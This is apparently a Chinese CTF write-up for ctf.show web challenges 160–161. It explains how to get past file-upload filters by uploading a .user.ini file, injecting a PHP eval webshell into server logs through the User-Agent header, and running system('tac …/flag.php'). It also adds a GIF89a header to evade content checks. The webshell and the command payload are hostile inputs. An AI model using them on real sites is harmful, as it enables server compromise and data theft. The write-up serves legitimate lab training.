ctf show web入门160 161

这道题跟前几题差不多增加了一个对 空格的限制

所以我们在写木马文件的时候只需要注意不要加上空格就好

这道题我们还是先上传user.ini文件

然后上传我们编写的木马文件,记得检查有没有空格

如果不确定自己的木马文件是否能上传成功就可以先发到repeater重放器里面如果resopnse中最后一行的结果类似与{"code":0,"msg":"upload/MM.png"}说明上传成功

此时我们就可以访问upload目录

然后在打开一个原来题目的网址,写入一个1.txt,并给它加上一个user-agent内容为:<?php eval($_POST1);?>

写好后点击execute运行,使其写入该网站的日志文件中

接下来回到upload目录下

开启POSTmethod进行命令执行

payload为:1=system('tac .../flag.php');

执行后在当前页面就可以看到flag了

161对文件的内容进行进一步限制,需要在前面限制条件的基础上再加上一个图片的头文件

我们要在user.ini文件和木马文件前加上一个GIF89a来绕过限制

因为GIF89a是一种图像文件格式的标准,所以可以在检验上传文件内容的时候绕过限制,使我们的攻击代码能够上传成功

相关推荐
乘风gg1 小时前
多 Agent 不是万能的!搞懂这 5 个原则,少走 1 年弯路!
前端·agent·ai编程
猩猩程序员2 小时前
Vercel 推出 Agent 框架 Eve:让 AI Agent 像写 Web 应用一样简单
前端
爱读源码的大都督2 小时前
Claude Code源码分析(三):为什么系统提示词中需要有tools呢?
前端·人工智能·后端
爱勇宝2 小时前
Claude Code 被曝暗藏“隐形检测”代码:封代理不是最可怕的,可怕的是你根本不知道它在干什么
前端·后端·程序员
小牛不牛的程序员2 小时前
我用 Claude Code 半天撸完了一个完整网站,AI 编程到底提升了多少效率?
前端
东风破_2 小时前
JavaScript 面试常考的字符串算法:从反转字符串到回文判断
前端·javascript
ITOM运维行者3 小时前
从零搭建企业级服务器监控体系:踩坑实录与架构设计
前端·后端
monologues3 小时前
深入 Vue 3 源码:响应式系统的精妙设计与编译优化
前端
hunterandroid3 小时前
Paging 3 分页:从手动分页到声明式加载
前端
用户4099322502123 小时前
Vue状态管理入门第四章:组合式store和SSR风险
前端·vue.js·后端